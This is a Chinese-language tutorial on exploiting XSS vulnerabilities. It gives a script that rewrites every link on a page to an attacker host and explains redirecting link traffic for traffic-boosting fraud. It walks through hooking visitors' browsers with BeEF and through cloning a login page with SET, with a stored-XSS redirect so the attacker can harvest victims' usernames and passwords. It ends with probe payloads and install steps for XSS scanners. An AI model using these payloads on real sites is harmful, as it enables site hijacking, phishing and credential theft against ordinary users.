一、XSS篡改链接
在XSS漏洞处注入代码如下:
注意根据网站的实际情况修改link的链接和节点
<script>
window.onload = function(){
var link=document.getElementsByTagName("a");
for(j = 0; j< link.length;j++){
link[j].href="http://attacker-site.com/";}
}
</script>
二、 篡改链接指向流量URL(刷流量)
只需将上面的http://attacker-site.com/到指定URL即可
三.、篡改链接指向恶意URL:利用beef进行恶意链接生成,利用hook.js执行其他命令
beef-XSS #第一步 在kali终端打开beef
service apache2 start #第二步 开启apache服务
cd /var/www/html #第三步 cd到html文件夹
leafpad index.html #第四步 打开index.html文件
将index.html中的IP地址修改为本机IP地址 #第五步
登陆Beef #第六步 账号密码都是beef
将http://attacker-site.com/ 更改为Kali的IP地址并向XSS漏洞传入更改后的JS代码 #第七步
上述操作完成后即可在beef中开到存在XSS漏洞的站点出现,并能配合MSF等工具加以利用
四、 XSS盗取用户信息
1.原理
克隆网站登陆页面,利用存储XSS设置跳转代码,如果用户访问即跳转到克隆网站的登陆页面,用户输入信息登陆,账号密码将被存储
2.setookit工具克隆网站(kali工具)
终端输入setookit #第一步打开setookit
输入y后依次选着1,2,3,2 然后直接回车 #第二步选择站点克隆
输入想要克隆的网址 #第三步克隆网站
3.利用存储XSS跳转到克隆网站
简单XSS payload:
<script>window.location="克隆网站地址"</script>
4.查看盗取的账号和密码
在kali终端中直接显示被诱导用户所输入的账号密码
探测XSS过程
靶场:XSS公开靶场
1 . 构造一个独一无二且不会被识别为恶意代码的字符串用来提交到页面
2 . 使用浏览器审查工具进行代码审查,寻找字符串是否在页面中显示
3. 闭合文本标签利用XSS
简单Payload: <script>alert(document.domain);</script>
闭合标签Payload:"</b><script>alert(document.domain);</script>
XSS工具介绍
- xsser:kali中默认安装
工具原理:不断拼接payload进行探测
启动方式:
kali终端输入:
xsser 命令行启动
xsser --gik 图形化界面启动
XSStrike:基于python3.6以上版本自动化开源工具
- linux下安装
sudo apt-get install python3-pip #安装python的pip工具,已经存在就不用安装了
git clone https://github.com/s0md3v/XSStrike.git #下载工具
pip3 install -r requirements.txt #安装工具,安装前注意CD到XSSstrike文件夹下
chmod +x xsstrike.py # 修改执行权限
2.windows下安装
github地址
打开网址,下载XSStrike压缩包 , cd到XSS文件夹下 。
命令行输入 pip3 install -r requirements.txt
桌面使用和sqlmap相同
- 新建快捷方式
- 键入的对象位置填 CMD
- 下一步将cmd.txt更名为XSStrike
-
新建完成后右键属性修改起始位置到XSStrike目录
使用方式:
打开快捷方式输入 python xsstrike.py